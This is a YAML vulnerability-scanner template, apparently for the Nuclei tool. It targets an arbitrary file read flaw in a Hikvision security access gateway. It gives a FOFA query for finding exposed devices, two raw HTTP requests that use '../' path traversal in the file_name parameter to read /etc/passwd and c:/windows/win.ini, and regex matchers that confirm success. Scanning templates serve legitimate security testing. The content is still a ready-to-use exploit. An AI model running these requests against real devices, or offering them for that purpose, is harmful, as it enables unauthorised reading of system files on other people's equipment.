id: hikvision-apt-gateway-fileread
info:
  name: 海康威视安全接入网关 file_name - 任意文件读取漏洞
  author: leadlife
  severity: high
  description: todo
  reference: 
    - https://wiki.wy876.cn/#/%E6%B5%B7%E5%BA%B7%E5%A8%81%E8%A7%86%E5%AE%89%E5%85%A8%E6%8E%A5%E5%85%A5%E7%BD%91%E5%85%B3%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E1.
  metadata:
    verified: true
    fofa-query: body="webui/js/jquerylib/jquery-1.7.2.min.js" && product="HIKVISION-安全网关"
  tags: hikvision,gateway,fileread,iot

http:
  - raw:
      - |
        GET /webui/?file_name=../../../../../etc/passwd&g=sys_dia_data_down HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Connection: close
        Cookie: USGSESSID=b75bce9897c9e543ab7be9ac44af4f76
        Upgrade-Insecure-Requests: 1
      
      - |
        GET /webui/?file_name=../../../../../c:/windows/win.ini&g=sys_dia_data_down HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Connection: close
        Cookie: USGSESSID=b75bce9897c9e543ab7be9ac44af4f76
        Upgrade-Insecure-Requests: 1
    
    stop-at-first-match: true
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
        condition: or